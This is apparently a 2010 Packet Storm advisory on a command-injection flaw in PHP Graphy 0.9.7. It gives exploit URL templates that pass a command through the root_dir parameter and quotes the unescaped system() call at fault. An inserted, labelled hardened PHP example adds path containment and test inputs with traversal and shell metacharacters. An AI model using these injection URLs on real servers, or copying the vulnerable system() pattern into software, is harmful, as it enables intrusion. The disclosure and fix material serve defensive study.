PHP Graphy 0.9.7 Command Execution

2010-05-25T00:00:00
ID PACKETSTORM:89889
Type packetstorm
Reporter Sniper Site Hacker
Modified 2010-05-25T00:00:00

Description

                                        
# ------------------------------------------------------------
# Remote Command Execution Vulnerability
# PHP Graphy <= 0.9.7 (index.php)
# ------------------------------------------------------------
# [+] Author   : Sn!pEr.S!Te Hacker
# [+] Email    : sniper-site@HoTMaiL.coM
# [+] T34M     : Sn!pEr.S!Te Hacker
# [+] Date     : 24-5-2010
# [+] Script   : Image » PHP Graphy
# [+] Download : http://sourceforge.net/projects/phpgraphy/files/phpgraphy/0.9.7/phpgraphy-0.9.7.tar.gz/download
# [+] Version  : [0.9.7]
  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=  
  
Exploit : phpgraphy-0.9.7\index.php  
  
http://localhost/phpgraphy-0.9.7/index.php?root_dir=[your command]   
  
http://127.0.0.1/phpgraphy-0.9.7/index.php?root_dir=[your command]  
  
  
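Vulnerable code (index.php, line 791):

system("cat \"".$root_dir.$display."_comment\"");

The root_dir value from the query string is concatenated, unescaped, into the command string passed to system().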
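
A hardened counterpart to the system("cat ...") call quoted from index.php, as an added example that is not phpGraphy's code or its official fix: the gallery root is a server-side value and the comment file is read directly instead of through a shell. read_comment(), the temporary gallery and the sample names are hypothetical and constructed for illustration.

```php
<?php
// Added example; not phpGraphy code. read_comment() and the temp gallery are hypothetical.

// Before (line 791 as quoted in the advisory): values reach a shell command line.
//   system("cat \"".$root_dir.$display."_comment\"");

// After: the root is a server-side value, never read from the request, and the
// file is opened directly, so shell metacharacters have no special meaning.
function read_comment(string $root, string $display): ?string
{
    if ($display === '' || strpos($display, "\0") !== false) {
        return null;                       // empty name or NUL byte
    }
    $base = realpath($root);
    $path = realpath($root . DIRECTORY_SEPARATOR . $display . '_comment');
    if ($base === false || $path === false) {
        return null;                       // root or target does not exist
    }
    // Containment: the resolved path (".." and symlinks removed) must stay under the root.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    $data = file_get_contents($path);
    return $data === false ? null : $data;
}

// Constructed sample data: a throwaway gallery with one comment file, plus a
// file outside it that must stay unreachable.
$tmp  = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'graphy_demo_' . getmypid();
$root = $tmp . DIRECTORY_SEPARATOR . 'pictures';
mkdir($root, 0700, true);
file_put_contents($root . DIRECTORY_SEPARATOR . 'holiday.jpg_comment', "Beach <2009>\n");
file_put_contents($tmp . DIRECTORY_SEPARATOR . 'secret_comment', "outside the gallery\n");

// Constructed inputs: a normal name, a traversal attempt, a name with shell metacharacters.
foreach (['holiday.jpg', '../secret', 'holiday.jpg";x;"'] as $display) {
    $comment = read_comment($root, $display);
    // Comments are user-supplied content, so escape before writing into HTML.
    printf("%-20s => %s\n", $display,
        $comment === null ? 'rejected' : htmlspecialchars(trim($comment), ENT_QUOTES, 'UTF-8'));
}

// Clean up the constructed files.
unlink($root . DIRECTORY_SEPARATOR . 'holiday.jpg_comment');
unlink($tmp . DIRECTORY_SEPARATOR . 'secret_comment');
rmdir($root);
rmdir($tmp);
```

Run from the command line with `php`; only the first name resolves to a file inside the gallery root, and the other two are rejected before any read happens.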
  
My favorite web sites : http://inj3ct0r.com/ & http://www.hack0wn.com/ & http://www.exploit-db.com

================== Greetz : all my friends ===================
* PrX Hacker * Sm Hacker * AbUbAdR * mAsH3L ALLiL * saleh Hacker * ALhal alsab
* HitLer.3rb * QAHER ALRAFDE * DjHacker * Mr.JLD * Mr.koka
  
  
  